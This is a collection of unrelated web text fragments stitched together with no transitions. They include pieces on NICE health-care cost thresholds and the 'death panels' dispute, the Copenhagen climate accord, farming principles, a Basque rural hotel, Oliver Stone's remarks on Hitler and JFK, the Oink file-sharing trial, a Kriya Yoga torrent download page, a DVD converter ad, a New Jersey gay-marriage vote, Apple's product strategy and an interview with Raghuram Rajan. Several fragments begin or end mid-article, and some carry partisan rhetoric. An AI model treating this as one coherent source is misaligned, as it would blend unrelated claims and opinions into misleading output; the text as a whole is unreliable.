To determine the dividing line between what is cost - effective and what is n't , it must set a threshold .
Taking its lead from Britain 's Department of Transport — which has a cost - per - life - saved threshold for new road schemes of about $ 2.2 million per life , or about $ 45,000 per life year gained — NICE rarely approves a drug or treatment that costs more than $ 45,000 per life year gained .
In short , NICE does not want the NHS to spend more than $ 45,000 to extend a citizen 's life by one year .
While NICE 's decisions have angered some doctors and patient groups — particularly some oncologists who say they are unable to prescribe expensive , life - extending cancer drugs — mainstream politicians , the media and most Britons accept NICE 's rare rejections as a necessary compromise to keep universal coverage affordable in the face of rising health - care costs .
As NICE chairman Sir Michael Rawlins recently told TIME , " All health - care systems have implicitly , if not explicitly , adopted some form of cost control .
In the U.S. , you do it by not providing health care to some people .
That 's a rather brutal way of doing it . "
Indeed , that 's the point PolitiFact raised in its piece on Palin 's lie :
Democrats responded by saying the accusation was n't true and highlighting the actual Medicare provision and what it said .
That was n't necessarily an effective strategy , said Drew Westen , a psychologist who studies political communication and advises Democrats on messaging .
" Instead of stopping and asking themselves , ' What are Republicans trying to appeal to ? ' the Democrats rolled their eyes and said , ' Is n't this stupid , ' " he said .
" On one level , it was stupid , but on another level , it was hitting seniors very close to where they live . "
People intuitively understand that health care reform is about lowering costs , and end - of - life care can be quite costly , he said .
The " death panels " claim exploited fears that people already had .
Rather than just saying the claim was n't true , Westen said , a better response would be that there already are " death panels " — run by insurance companies .
Indeed , there is no doubt that " death panels " already exist .
They 're just called insurance - company policies .
For right - wingers like Sarah Palin , though , it 's better to have people denied any coverage whatsoever than the possibility that a government insurance plan might ration access to expensive treatments .
Baldfacedly and defiantly lying about it , evidently , is just part of the deal .
The UN has dropped the 31 January deadline by which time all countries were expected to officially state their emission reduction targets or list the actions they planned to take to counter climate change .
Yvo de Boer , UN climate change chief , today changed the original date set at last month 's fractious Copenhagen climate summit , saying that it was now a " soft " deadline , which countries could sign up to when they chose .
" I do not expect everyone to meet the deadline .
Countries are not being asked if they want to adhere … but to indicate if they want to be associated [ with the Copenhagen accord ] .
" I see the accord as a living document that tracks actions that countries want to take , " he told journalists in Bonn .
" It 's a soft deadline .
Countries are not being asked to sign the accord to take on legally binding targets , only to indicate their intention , " he said .
The deadline was intended to be the first test of the " Copenhagen accord " , the weak , three - page document that emerged at the end of the summit , and which fell far short of original expectations .
It seeks to bind all countries to a goal of limiting warming to no more than 2C above pre-industrial times and proposes that $ 100bn a year be provided for poor countries to reduce emissions and adapt to climate change after 2020 .
But with just 10 days to go , only 20 countries out of 192 have signed up , with many clearly unready or unwilling to put their name to the document .
Countries which have signed so far include India , Russia , Mexico , Australia , France and Norway .
De Boer also endorsed the controversial idea of short - circuiting the traditional UN negotiating process of reaching agreement between all countries by consensus .
Instead , he argued that a smaller group of countries could negotiate a climate agreement on behalf of the many .
" You cannot have 192 countries involved in discussing all the details .
You cannot have all countries all of the time in one room .
You do have to safeguard transparency by allowing countries to decide if they want to be represented by others , and that if a debate is advanced then the conclusion is brought back to the larger community " , he said .
However , this more exclusive method of reaching agreement was criticised by some in Copenhagen after the host government , Denmark , convened a meeting of 26 world leaders in the last two days of the conference to try to reach agreement on behalf of everyone .
Critics argued that this was not only illegal , but undermined negotiations already taking place among the 192 countries and threatened the UN 's multilateral and democratic process .
" The selected leaders were given a draft document that mainly represented the developed countries ' positions , thereby marginalising the developing countries ' views tabled at the two - year negotiations .
The attempt by the Danish presidency to override the legitimate multilateral process was the reason why Copenhagen will be considered a disaster , " said Martin Khor , director of the South Centre , an intergovernmental think tank for developing countries based in Geneva .
The US and Britain have argued since the conference that climate negotiations are best served by meetings of the world 's largest polluters , such as China , the US , India , Brazil and South Africa .
These countries , which emit more than 80 % of global emissions , signed up to a deal in the final hours of the summit .
Brazil , India , China and South Africa , known as the " BASIC " group , meet next week in Delhi to agree a common position ahead of further UN climate talks .
One of the more pleasing developments of the last decade has been the long - overdue beginning of a national conversation about food -- not just the arcane techniques used to prepare it and the luxurious restaurants in which it is served , but , much more important , how it is grown and produced .
The only problem is that so far it has n’t been much of a conversation .
Instead , what we have are two armed camps deeply suspicious of one another shouting past each other ( sound familiar ? ) .
On the one side , the hard - line aggies seem convinced that a bunch of know - nothing urbanites want to send them back to Stone Age farming techniques .
On the other side , there ’s a tendency by agricultural reformers to lump together all farms ( or at least those that are n’t purely organic , hemp - clad mom-and - pop operations ) as thoughtless ravagers of the environment .
Well , at least we ’re thinking about it , so I suppose that ’s a start .
But the issues we ’re facing are not going to go away , and they are too important to be left to the ideologues .
What I ’d like to see happen in the next decade is a more constructive give - and - take , the start of a true conversation .
With that goal in mind , I ’d like to propose a few ground rules that might help move us into the next phase -- fundamental principles that both sides should be able to agree on .
* Agriculture is a business .
Farming without a financial motive is gardening .
I use that line a lot when I ’m giving talks , and it always gets a laugh .
But it ’s deadly serious .
Not only do farmers have expenses to meet just like any other business , but they also need to be rewarded when they do good work .
Any plan that places further demands on farmers without an offsetting profit incentive is doomed to fail .
* What ’s past is past .
Over the last 50 years , American farmers performed an agricultural miracle , all but eliminating hunger as a serious health issue in this country .
But that battle has been won , and though those gains must be maintained , the demands of today -- developing a system that delivers flavor as well as quantity and does it in an environmentally friendly way -- are different .
* Food is not just a culinary abstraction .
No matter how much you and I might appreciate the amazing bounty produced by talented , quality - driven farmers , we also have to acknowledge that sometimes food is . . . well , just food .
So when we start dreaming about how to make our epicurean utopia , we also have to keep in mind that our first obligation is to make sure that healthful , fresh food remains plentiful and inexpensive enough that anyone can afford it .
* There ’s no free pass on progress .
Just because you ’ve always farmed a certain way does not mean that you are owed the right to continue farming that way in the future .
The days of a small or medium - sized farm making a decent profit growing one or two crops and marketing it through the traditional commodity route are long past .
The world is changing , and those who can adapt are the ones who will be successful .
* The world is not black and white .
The issues facing agriculture today are much more complicated than lining up behind labels such as “ local ” and “ organic , ” no matter how praiseworthy they might seem in the abstract .
* No farm is an island .
That ’s not literally true , of course ; there are several island farms in the Sacramento Delta .
But even there , farmers have to remember that they ’re living in an ever - more crowded state where their actions affect others .
Assuming that what happens on your land is nobody ’s business but your own just does n’t work anymore .
* Do n’t let the perfect be the enemy of the good .
Holding out for an unattainable dream may mean losing a chance at a more easily realized goal .
At the same time , just because an idea may not be the perfect answer , it does n’t mean that there are n’t benefits to it .
A completely locavore diet is , well , loco , but buying as much locally grown fresh fruits and vegetables as you can is just common sense .
* Quality is more expensive than quantity .
Farming fruits and vegetables that are not just healthful but also have great flavor takes a lot of time and work and usually means not growing as much as a neighbor who does n’t focus on flavor .
So when you ’re shopping , do n’t begrudge a good farmer a little higher price -- that ’s what it takes to keep him in business .
* You do n’t climb a ladder starting at the top rung .
In a system as complex as our food supply , change is evolutionary .
Remember long - term goals , but focus on what ’s immediately achievable .
Any argument that begins , “ All we have to do is rewrite the Farm Bill , ” is probably decades , if not centuries , from reality .
But there are plenty of small things we can do now to start us down that road .
* Do n’t assume that those who disagree with you are evil , stupid or greedy .
And even when they are , that does n’t relieve you of the responsibility for making a constructive and convincing argument .
* What ’s political is also personal .
If you believe in something , you should be willing to make sacrifices to support it , even if it ’s expensive or inconvenient .
Wailing about farmers who use pesticides and then balking at paying extra for organic produce is hypocritical because the yields in organic farming are almost always lower .
On the other hand , there ’s nothing wrong with doing the best you can whenever you can -- as long as you ’re willing to accept compromises from the other guy too .
* Finally , and most important : Beware the law of unintended consequences .
Developing tasteless fruits and vegetables was not the goal of the last Green Revolution ; it was a side effect of a system designed to eliminate hunger by providing plentiful , inexpensive food , but that also ended up rewarding quantity over quality .
We should always keep in mind that when we ’re dreaming of a system that focuses on the reverse , we run the risk of creating something far worse than strawberries that bounce .
russ.parsons@latimes.com
Una CASA CON ENCANTO
Esta tierra que pisáis os sustenta acogedora .
Esta casa os saluda con simpatía .
Sus moradores os desean una estancia tranquila y placentera .
Mejor Hotel del Mundo Calidad – Precio 2019 por TripAdvisor
Son numerosos los premios que ha recibido Lurdeia .
Desde el año 2013 hemos sido galardonados por TripAdvisor con el premio “ Travellers Choice ” y en 2020 como el 2 º de España y 9 º de Europa en categoría Hoteles Pequeños y además el 2 º de España , 4 º de Europa y 18 º del mundo en categoría Hoteles Románticos .
Además nos han concedido la distinción de “ ecolideres platino “ , la maxima de un hotel “ eco ” .
En 2019 el buscador de viajes Tripadvisor ha galardonado a la casa rural de Bermeo Lurdeia como el nº 1 del Mundo , nº 1 de Europa y nº 1 de España en la categoria de mejor hotel calidad - precio ( economico ) .
LURKOI , AGRICULTURA ECOLóGICA
Nosotros no poseemos la tierra , Ama Lur , La Diosa Madre Tierra nos tiene , sostiene , alberga , protege , sustenta a todos nosotros en su generoso regazo .
Madre de la biodiversidad y pluralidad cultural de los pueblos .
Madre viajera del cosmos infinito eres cuna y tumba de todos los seres vivos .
El Padre Sol proporciona la energía y la Abuela Luna establece los ciclos en la Naturaleza .
Nuestro amado baserri es fuente y raíz de nuestra cultura ” .
Hitler was enabled by Western bankers and the JFK assassination story is a national fairytale , says Oliver Stone
Adolf Hitler was a product of his era and Americans are in denial about who really shot JFK , according to Oliver Stone .
The Hollywood filmmaker , who is working on a 10 - part documentary called The Secret History Of The United States , said the German dictator was ‘ enabled by Western bankers ’ .
Giving a lecture to high school students on the role of film in peace - building , Stone told how ‘ psychopath ’
Hitler rose to power thanks to big business leaders and other supporters who appreciated his vow to destroy communism .
' Controversial ' : Oliver Stone lectures 300 students in Bangkok today
Stone , who is in Bangkok for a visit organised by the Vienna - based International Peace Foundation , also told the 300 pupils his movie JFK was his most controversial to date as explores other theories into who killed U.S. president John F Kennedy .
Hitler was and managed to ‘ seduce ’ Germany 's military industrial complex .
He said : ‘ Hitler is a monster .
There is no question .
I have no empathy for Hitler at all .
‘ He was a crazy psychopath .
But like Frankenstein was a monster , there was a Doctor Frankenstein .
He is product of his era . ’
' In denial ' : Oliver said his film JFK , about the assassin John F Kennedy - pictured in 1963 moments before with wife Jacqueline - is his most controversial to date
Stone said the aim of his documentary , which two historians are helping him with , was to offer a fuller understanding of the 20th century and how some of those lessons may be relevant to President Barack Obama .
‘ What has America become ?
How can we in America not learn from Germany in the 1930s ? ’ the Oscar - winning director asked .
Referring to his 1991 movie ‘ JFK ’ , he told students the U.S. remains in denial over the possibility that someone other than Lee Harvey Oswald could have assassinated Kennedy .
' Monster ' : Adolf Hitler
Stone said exploring alternative theories over the JFK assassination remains too sensitive for those in the media or academia who ‘ would be endangering their careers and their position ’ .
He said : ‘ To this day , many key Americans in power are in total denial about this story .
‘ They do n't even want to know about the possibility that he was killed by someone other than Lee Harvey Oswald .
It is a national fairy tale . ’
‘ JFK ’ ridicules the Warren Commission 's conclusion that Oswald acted alone and suggests a massive conspiracy .
Stone 's film centered on a theory by New Orleans District Attorney Jim Garrison that a CIA - led mutiny killed the president and the plotters walked away unscathed .
Garrison 's theories went to court in 1967 , but Clay Shaw , the alleged ‘ evil genius ’ behind the assassination , was acquitted .
Stone today said it was ‘ a good thing ’ to revisit the JFK assassination .
But he came under fire from the historians and film reviewers who contended Stone had fudged facts , invented characters and elevated speculation to truth to support his burning belief that the killing was a high - level government conspiracy .
‘ It 's an amazing story and I did it , ’ Stone said .
‘ I thought I would be respected for it , and I was lambasted in the establishment press .
I was called a myth - maker , a propagandist .
I did n't see it coming .
I thought the Kennedy murder was safe . ’
Stone is famous for several other movies , including the Vietnam War films Born On The Fourth Of July and Platoon , which won four Oscars , including best picture and best director .
Sony released a batch of new screenshots of upcoming action trilogy ‘ God of War III ’ .
See Kratos pose with enemies that tend to be the size of a six story building .
Hmm .. they really do use that whole ‘ David vs. Goliath ’ theme a lot in this 3rd installment .
Check out the screenshots after the jump .
Alan Ellis told the court he had no intention to defraud copyright holders A man who ran a music - sharing website with almost 200,000 members has been found not guilty of conspiracy to defraud at Teesside Crown Court .
Alan Ellis , 26 , was the first person in the UK to be prosecuted for illegal file - sharing .
He operated the site , called Oink , from his flat in Middlesbrough from 2004 until it was closed down in a police raid in October 2007 .
In that time Oink facilitated the download of 21 million music files .
Bank accounts
The site allowed active members to find other people on the web who were prepared to share files - enabling users to get hold of free music .
Users were asked to make a donation , although it was not necessary for them to do so to invite friends to join the site .
The jury was told that police found almost US $ 300,000 ( £ 183,580 ) in Mr Ellis 's Paypal account and that he received $ 18,000 ( £ 11,000 ) a month in donations from people using his website .
Mr Ellis told the court there was no intention to defraud copyright holders .
He said the donations were to pay for the server 's rental and any " surplus " would eventually be used to buy a server .
He agreed he had about 10 bank accounts with some £ 20,000 in savings when police raided the house he shared .
Moved to Amsterdam Giving evidence , Mr Ellis explained why he set up the website .
" It was to further my skills .
To better my skills for employability . "
Mr Ellis said the website was developed from a free template , which had a torrent file - sharing facility included in it .
Oink did not host any music itself , it indexed the files users had available on their computers for others to download .
Originally the site was hosted on his home computer , but by 2007 it had moved to a commercial server in Amsterdam because of the amount of internet traffic it was attracting .
Mr Ellis , who had a full - time job as a software engineer , was born in Leeds and grew up in south Manchester , studying A - levels in Cheadle .
He declined to speak as he left the court .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
" Spiritual Treasures - Final Edition "
FREE download of complete " Teachings of Love " with Kriya Yoga
All previously published spiritual content created and published online from 31 July 1997 - 17 May 2012 on www.kriyayoga.com - also known as the Cyberspace Ashram - is now available for free as one single compressed file " Spiritual Treasures - Final Edition " from THIS page .
Copyright © " Spiritual Treasures " - Post Mortem
Learn Kriya Yoga to feel God's Love
Download information " Spiritual Treasures - Final Edition " with complete Kriya Yoga teachings
Copyright © " Spiritual Treasures "
Below topic icons show you an overview of all main content of the " Spiritual Treasures - Final Edition " .
You find some 39988 files with text , graphics and photos from totally 6 Forums ( the first FAQ section and from 4 more recent forums from the Cyberspace Ashram , spiritual topics from the Blog : Secrets of Love - Solutions of Love as well as the full content and spiritual texts from the previous online Photo gallery of the Philippine islands .
Included of course is the complete teachings of love , the Kriya Yoga technique in every necessary detail and all other major sections of the Cyberspace Ashram - in English language as well as German language .
All " Spiritual Treasures - Final Edition " - key data for you :
file size approximately 3.55 GB
data - file name : Spiritual_Treasures.tar.bz2
torrent file name : Kriya_Yoga_Spiritual_Treasures.torrent
md5sum 54d1622ea2d03c29cbce6ab7ef5ccf4a
sha1sum c7aa15bd77382cb9fa1515c8bc24f7f19d50038e
Bittorrent info hash : 8e0d636d4e7489ca55b5fd1ab044dc80ea2d15ba
Revised edition of the " Spiritual Treasures - Final Edition " is available
instant FREE download
Spiritual Treasures with Kriya Yoga - Download by BitTorrent is free , and all server expenses , site maintenance or spiritual counseling are paid by your honest contribution only .
Please keep seeding the torrent for as long as you use part or all of the " Spiritual Treasures " .
The revised edition will only be available per BitTorrent download .
Revised edition - change log
The following changes or corrections are made in the revised " Spiritual Treasures - Final Edition " :
All links to online sites and online pages removed .
Remote sites are mentioned with domain name in italic where ever spiritually reasonable for your reference .
You may use search engines to find such online references if still existing .
Many sites or pages however have been removed and thus the live links would be but a distraction in future decades or centuries .
broken images removed or replaced where available
All java removed
most javascript removed
All reported or known broken links fixed - " Spiritual Treasures - Final Edition " contains 39988 files with more than 30'000 links .
all links have been multiple times tested using 2 different linkchecker tools .
all 5 forums converted into offline version and added
Clean - up of forum files to speed up page loading by removing obsolete meta tags .
added 5 eBooks Happy Children , Fathers Day , Organic Farming and Gardening , Spiritual Encyclopedia , Mother Holle in PDF format for free sharing
included Amaze fonts to display correct title fonts - install the amaze fonts according to your operating system procedures and enjoy .
adapted Blog CSS in offline version for full page view in monitors of at least 1024px width in current Firefox browser
A few New chapters added = read all to find all , no short cuts to God .
Then practice all in a useful and helpful life of love serving real humans and natural human needs .
Most content files spell checked in English , Spanish and German language using 2 different spell check tools .
Totally since June 2012 - 3685 files received corrections , clean up , new images or optimizations
Most HTML content files now are valid HTML401 or XHTML
More content but smaller overall file size thanks to more clean up of files and HTML code .
Now approximately 3.55 GB
66 new pictures added
Recommended Bittorrent clients :
Bittorrent FREE version for WIN and Mac
u Torrent FREE version for WIN and Mac ( and Linux )
Ktorrent - by default already installed in most Linux systems
Download Kriya_Yoga_Spiritual_Treasures.torrent
AFTER having properly installed your Bittorrent client software , click to download original torrent Kriya_Yoga_Spiritual_Treasures.torrent = file Spiritual_Treasures.tar.bz2 .
While almost all of the creation cost of the Spiritual Treasures has been financed by my own self - earned money from 1997 - 2012 .
ALL current and future services or emails for your spiritual benefit are financed only by your very own honest donation .
Your honest donation to support my services is welcome .
The very least you can do , is to keep seeding the torrent for as long as you or your family keep using part or all of the Spiritual Treasures - may be all life long .
Speed up download and seeding
To speed up download AND seeding , please manually ADD following new trackers into your torrent client :
udp://tracker.coppersurfer.tk:6969/announce
http://mgtracker.org:2710/announce
http://explodie.org:6969/announce
http://tracker1.wasabii.com.tw:6969/announce
udp://tracker.leechers-paradise.org:6969/announce
udp://tracker.pirateparty.gr:6969/announce
udp://tracker.zer0day.to:1337/announce udp://inferno.demonoid.pw:3391/announce
To further improve your torrent efficiency and speed , please enable the following features in your torrent client cobfiguration :
Use DHT to get additional peers ( DHT )
Use peer exchange ( PeX )
Use protocol encryption
Allow unencrypted connections
If new to torrent peer to peer file sharing , then first download the BitTorrent client Stable ( FREE version ) from http://www.bittorrent.com/downloads available for Windows and Mac. Linux user typically have one or multiple torrent clients installed by default .
Download information " Spiritual Treasures Bonus "
Get the torrent file to instantly download copyright free ( public domain ) 5000 +
Beautiful Philippines nature pictures , scenery , ocean views , roses and flowers .
Please keep sharing " Spiritual Treasures "
Keep your Bittorrent client running for as long as you enjoy Kriya Yoga or the Spiritual Treasures to keep sharing for free with all world what you have received for free .
By seeding what you have received , you become an active member of a love team .
Enjoy God 's love and bliss - the more you share what you received the more love and bliss you can receive and the more successful your own Kriya Yoga and spiritual progress can be .
Find full Spiritual Treasures download information on the Spiritual Treasures Facebook page with many helpful Spiritual Treasures ' Notes or visit the older Cyberspace Ashram for Kriya Yoga , God and Love Facebook page .
You may also subscribe to both Facebook RSS feeds :
Love and Bliss
hans
On your wings of Love
Spiritual lessons for life
Auf den Flügeln der Liebe
Spiritual FAQ
God is Love
Lessons and feedback
Secrets of Love
Solutions of Love
Forum experiences
Forum relationship
God's Love
Kriya Yoga
Jesus love
Spiritual Encyclopedia
Open for God
For meditation
God Yoga
True Love Tests
Christmas messages
Love eCards
Beautiful Philippine islands
Forum alternative medicine
Beautiful wallpapers
Cyberspace Ashram For Kriya Yoga
" Spiritual Treasures Bonus " Beautiful Philippines nature pictures Download .
Those of you sending money to FDL can rest assured that it is being well spent on things like this :
Comparing Obama to McCain on an issue that has already been settled is an excellent use of funds and a real great way to advance the progressive cause .
And to make things even better , there will probably be three or four diaries concern trolling us about the base being depressed for 2010 .
Wonder why that is ?
Could n’t have anything to do with the constant and steady drumbeat from the firebaggers telling us how much Obama sucks on a daily basis , could it ?
I ’m sure Norquist is thrilled with the efforts .
And if you are going to come in here defending this nonsense , telling us they are doing a valuable service by pushing the Overton window to the left , spare me .
You do n’t move the window to the left adopting right wing frames .
You just validate what the wingnuts are saying .
1. Strong converting ability
Convert DVD to iPhone Mac
Rip DVD to iPhone MPEG - 4 , H.264/MPEG-4 AVC , MOV , M4V with excellent output quality on Mac OS .
DVD to iPhone audio conversion
Extracting DVD music , converting to iPhone AAC , MP3 , WAV , AIFF , M4A is also allowable on Mac OS X with 4 Easysoft Mac DVD to iPhone Converter .
Convert DVD to iPhone and iPod models
The output video and audio files which are converted from DVD can be played on iPhone , iPhone 3G , Apple TV and all iPod models .
Output one file to different formats with only one conversion
With 4 Easysoft Mac DVD to iPhone Converter , you can convert one file to different output formats with only one conversion .
2. Extra editing features
Add watermark
You can add a text / image watermark to your video and set its position and transparency .
Adjust output effect
Adjust the brightness , saturation and contrast of the video .
If the quality of the image is not very good , you can improve it with Deinterlacing function .
Clip DVD movie
With handy slider in Trim edit window , you can freely and clearly locate the beginning and end point of the desired segment and cut off unwanted parts .
Crop video
4 Easysoft Mac DVD to iPhone Converter enables you to remove black edges of the movie and watch it in 16:9 , 4:3 , full screen or keep original .
Output setting parameters
You can adjust output video parameters of resolution , frame rate , encoder , bit rate and audio sample rate , channel , encoder , bitrate .
Selectable subtitle and audio track
This DVD to iPhone for Mac converter enables you to choose subtitles and audio tracks for DVD ripping .
Take a snapshot when previewing
You are allowed to capture your favorite scene from DVD movies during preview the edited effect and save in BMP , JPEG , GIF image format .
“ We are upset , we are disappointed , but we are n’t done fighting , ” said Leslie Gabel - Brett , Lambda ’s director of education and public affairs .
Image
The Senate gallery just before the final vote , a nay , was cast to defeat the gay marriage bill , 20 to 14 .
Supporters vowed a battle in State Supreme Court .
Credit ... Richard Perry / The New York Times
Opponents of gay marriage said that they , too , were prepared for a legal fight .
Jon Tomicki , a leader of the New Jersey Coalition to Preserve and Protect Marriage , said that legislators had already complied with the court order by enacting civil unions , and urged lawmakers to let the public cast its verdict on gay marriage in a referendum .
“ In 30 other states , voters have gotten the chance to decide , ” Mr. Tomicki said .
“ There ’s no reason why New Jerseyans should n’t have the same right . ”
In nearly every instance in which gay marriage has been put up for a referendum , it has been defeated .
But supporters of gay marriage view their cause as a matter of civil rights which should be settled by the courts and Legislature , and point out that in 1915 , New Jersey voters in a referendum rejected giving women the right to vote .
Five years later , the 19th Amendment granted women voting rights .
Although it was not a major issue in the governor ’s race , the effort to win legislative approval of same - sex marriage is widely viewed as a casualty of Mr. Corzine ’s defeat in November .
Some Democrats who had been receptive to the issue , and took financial and organizational support from gay activists , grew squeamish .
Senator Stephen M. Sweeney , who is scheduled to become Senate president this month , said he thought voters would look unkindly on the Legislature if it pushed for a social issue at a time of economic suffering .
Senator Sweeney did not cast a vote on the measure on Thursday .
In all , five senators did not vote and one was too ill to attend .
Senator Gerald Cardinale , a Republican from Cresskill , said during the debate on the Senate floor on Thursday that the results of the governor ’s race were a clear indication that voters opposed gay marriage .
Senator Cardinale said that although the civil unions statute was flawed , the state would be doing “ violence ” to the institution of marriage by changing its current definition as a union between one man and one woman .
When the Solution Has No Price
One problem faced by a society that is always working toward solutions to various problems is that certain solutions , however effective , may go unused because they can not be commodified .
Consider obesity .
True , billions of dollars have been made selling all sorts of diet and exercise and weight - loss products , but perhaps the best solution is the free one : eat a bit less and a bit better and take a good 30 - minute walk every day .
But it ’s hard to make money pushing that idea .
In this interview with The Takeaway , the author and surgeon Atul Gawande offers another compelling example .
Gawande ’s new book , The Checklist Manifesto ( see Levitt ’s strong endorsement here ) describes his effort to create a checklist for use in surgical settings that could cut down on errors .
The checklist , piloted in eight hospitals around the world , proved to be very successful .
It was also essentially free .
But , as Gawande explains in the Takeaway interview , widespread adoption has been far slower than he would like .
Why ?
If a pharmaceutical company came up with a drug or a device that offered the same improved outcomes as the checklist , Gawande notes , that drug or device would be worth billions of dollars , and would be marketed accordingly .
The lowly checklist , meanwhile , has no such sponsor and therefore is far slower to spread .
Here ’s hoping that the checklist , along with other cheap and simple solutions , can somehow keep worming their way into the marketplace , despite competition from much better - promoted ( and often inferior ) ideas .
Flash an exotic prototype , then — Presto !— get people to buy your more boring stuff .
That kind of thinking still rules at most electronics companies .
Apple under Steve Jobs only shows off actual products .
The difference ?
Apple 's arcane secret to success .
Advertisement
A specter harrows the consumer electronics industry : malaise .
Like washed - up Catskill magicians unable to let go of old routines while a brash upstart steals their audience , nearly every maker of consumer electronics in the world clings to a quaint song - and - dance about prototypes .
" Here is your possible future , " they bark , flourishing the latest conceptual product from the lab .
" Now watch us make it disappear ! "
Advertisement
Apple 's chief magician knows better , pulling solid objects out of the aether ; products you can actually buy .
If this sounds like a minor complaint about most of the industry 's lack of imagination in marketing , you 're misunderstanding the whole act .
The fact that Apple does not reveal prototypes but shipping products is the fundamental difference between their entire business strategy and that of the rest of the industry .
It evokes a feeling of trust between Apple and consumers — that when Apple actually reveals a product , it 's something that they 're confident enough to support for years to come .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
For the better part of the last century — starting arbitrarily with the 1934 Chicago World 's Fair and its stark , Randian slogan : " Science Finds , Industry Applies , Man Conforms " — the producers of consumer goods have stuck to a basic formula :
Show off a prototype ; gauge public response ; then release a commercial product that is less ambitious , if released at all .
It worked in part because it told a compelling story .
" Here is what the future looks like ; and here 's an intermediate step towards that future that you can buy today . "
Electronics ' sister industries followed the same tack .
Car shows were populated with prismatic concept cars hewn with non-Euclidean angles rotating on raised daises .
Videogame tech demos showed graphics too impossible to believe , but entrancing enough to betray our better judgment .
Advertisement
But in Jobs ' encore performance , Apple has changed the routine .
Outwardly Apple 's showmanship is competent , workmanlike .
Jobs - as - performer wears an understated uniform that does not distract from the act .
His humor , when it exists , is subtle .
The closest an Apple keynote gets to pomp are pie charts that look like wooden logs .
Advertisement
Yet when Jobs reveals the company 's next product , there 's a critical difference :
It exists .
When possible , it is available for retail purchase the same day .
There are few maybes or eventuallys tempering the presentation : " Here is the tiny miracle we 've created .
We want to sell it to you today . "
As a counter - example , let me pick on Lenovo for a moment :
At CES this year , they showed off the Ideapad U1 prototype , a netbook with a screen that could be decoupled from the keyboard to operate as a multitouch tablet .
Clever idea , seemingly well considered and brain - bendingly not available for purchase today .
Advertisement
Do you see the story that Lenovo is spoiling for themselves ?
First , they 've deprecated the imagined utility of every other laptop they sell without the flashy removable tablet screen .
Yet they 've also whispered a nervous apology to potential customers :
" We could make something this cool , but we 're not so confident in our plans to fully commit to them .
Maybe you could tell us if you think you 'd like this trick ? "
Advertisement
Lenovo might make the U1 .
They might sell a few units .
But simply by revealing it before it was a living , breathing SKU on retail shelves , they 've relegated it to a quirky sideshow .
See also :
The Chevy Volt , announced so long ago that GM has gone through a bankruptcy and shotgun CEO transition without actually being available for sale .
Bet those will be flying off the lots .
Advertisement
Some of Apple 's peers understand the need to manage expectations .
Have you ever seen RIM show off a BlackBerry prototype ?
What about Nintendo ?
They do n't pull a Microsoft - like move of showing very early - stage products to reporters and potential customers .
They simply pull out a Wii or a DS and say , " This is it .
Give it a try . "
Everybody loves a prototype .
Engineers get a chance to strut their stuff .
If you 've got a 40 - inch OLED TV in a lab somewhere , bring it to your trade show .
Executives take pride in their company 's technical prowess .
Marketers get an excuse to throw an even fancier party .
And customers and press get idyll fodder for a daydream .
Advertisement
None of those things equal units sold .
None of those things turn a customer into an ardent fan .
That an industry exists around rumors and leaks for unreleased products may be useful to Apple , but it is a side - effect of their product strategy , not the basis of their marketing .
Consider that when Apple finally does release a product , the marketing tends to showcase the device itself in clear , comprehensible ways .
Apple is n't shy to make claims about the grandiose , epiphanal nature of its products because — whether they pull it off or not — they have built a culture in which every product they make is designed to be world class .
Advertisement
Instead of prototypes , Apple makes patents .
Although I 'm certain Apple would keep these patents behind the curtain if they legally could , their existence proves something amazingly pedestrian :
Behind the scenes , Apple is essentially the same sort of company as every other electronics star in the world .
They 're developing prototypes .
They 're trying new tricks , seeing what works .
They know experimentation is the lifeblood of innovation .
Advertisement
But like the consummate showmen they are , they temper the wooly process of building the future with something missing from nearly every other technology company : restraint .
Apple may come off at times as a bit soulless , but at least they 've got class .
And when that class allows them to sell more products that make happier customers , I 'll take class over flash every time .
That the Consumer Electronics Show is held in Vegas is no accident .
It 's a derelict spectacle meant to cater to mid-level buyers , gilt with the threadbare trappings of Innovation and Progress , but sending most of its audience home with nothing but a hangover and a t - shirt .
Advertisement
When Apple pulls a tablet out of its hat next week , it 's likely that we wo n't be able to purchase it for a couple of months , but rest assured that 's only because of regulatory pitfalls .
And besides , there will be no doubt that when Jobs shows us his vision of the future , Apple will be doing everything they can do to get them into our hands .
That 's the trick of it .
Consumer audiences have grown wary of nearly a century of predictable sleight - of - hand .
We 've seen too many companies promise us the future , then fail to deliver it .
Advertisement
I believe that there are dozens of companies out there with the talent to pull the future toward us along some retail tesseract .
But until they conquer their stage fright , leave aside the vaudevillian antics that savvy , jaded audiences no longer find compelling , and embrace a more honest and practical sort of conjuration , Apple will continue to be the defining technology performance of our age .
In August 2005 at the Kansas City Fed ’s annual symposium in Jackson Hole , Wyo. , Raghuram Rajan presented a paper filled with caution .
Answering the question “ Has Financial Development Made the World Riskier ? ” the University of Chicago economist observed that financial innovation had delivered unquestioned benefits , but also had produced undeniable risks .
“ It is possible these developments may create … a greater ( albeit still small ) probability of a catastrophic meltdown , ” he told the assembled central bankers and academics .
“ If we want to avoid large adverse consequences , even when they are small probability , we might want to take precautions . ”
It was a discordant note at a forum celebrating Alan Greenspan ’s tenure as Fed chairman ; many deemed his conclusions “ misguided . ”
But history , of course , proved that Rajan ’s analysis was dead on .
The careful study and willingness to challenge dogma Rajan displayed at Jackson Hole are in evidence throughout his work .
As IMF chief economist , he produced controversial reports that questioned the efficacy of foreign aid and foreign investment .
In 2003 , he co-authored “ Saving Capitalism from the Capitalists , ” suggesting that government intervention is essential , not inimical , to market capitalism , but that it must be done right .
These days , policymakers listen carefully to Rajan — in May he testified before the Senate Banking Committee on the too - big - to - fail problem ; he serves as economic adviser to the prime minister of India ( his birthplace ) — and not simply because of his insight on the recent financial crisis , but based on the quality of his scholarship .
Rajan is a highly respected economist , recipient of the inaugural Fischer Black Prize for the person under 40 who has contributed most to theory and practice in finance .
“ He has made path - breaking contributions , ” noted the award committee , “ to our knowledge of financial institutions , the workings of the modern corporation , and the causes and consequences of the development of the financial sector across countries . ”
His extensive research continues to shape academic and policy debate , and in the following interview with the Minneapolis Fed ’s Ron Feldman , Rajan touches on these topics and others with eloquence and wisdom .
ARE BANKS ( STILL ) SPECIAL ?
Ron Feldman : I had suggested that we interview you , and so I get to do the interview .
Raghuram Rajan :
You picked the short straw .
[ Laughter ]
Feldman : Right .
[ Laughter ]
I thought that we could start with your work on the nature of banking .
Banks make loans , such as loans to small firms , and provide other services , for example , around payments , that are not easy to replace .
That is , other firms do not seem to provide the same offerings as banks .
